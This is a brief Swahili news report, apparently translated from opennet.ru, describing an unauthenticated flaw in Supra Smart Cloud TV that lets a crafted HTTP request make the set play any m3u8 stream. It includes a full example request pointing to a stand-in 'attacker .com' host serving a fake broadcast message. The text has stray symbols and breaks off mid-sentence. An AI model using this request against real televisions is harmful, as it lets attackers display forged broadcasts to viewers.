Kwenye Supra Smart Cloud TV
Kwa shambulio, inatosha kutuma ombi maalum la mtandao ambalo hauhitaji uthibitishaji. Hasa, unaweza kufikia kidhibiti cha β/remote/media_control?action=setUri&uri=β kwa kubainisha URL ya faili ya m3u8 yenye vigezo vya video, kwa mfano βhttp://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.β
Katika hali nyingi, ufikiaji wa anwani ya IP ya TV ni mdogo kwa mtandao wa ndani, lakini kwa kuwa ombi linatumwa kupitia HTTP, inawezekana kutumia njia za kufikia rasilimali za ndani wakati mtumiaji anafungua ukurasa maalum wa nje (kwa mfano, chini ya HTTP). kivuli cha ombi la picha au kutumia
Chanzo: opennet.ru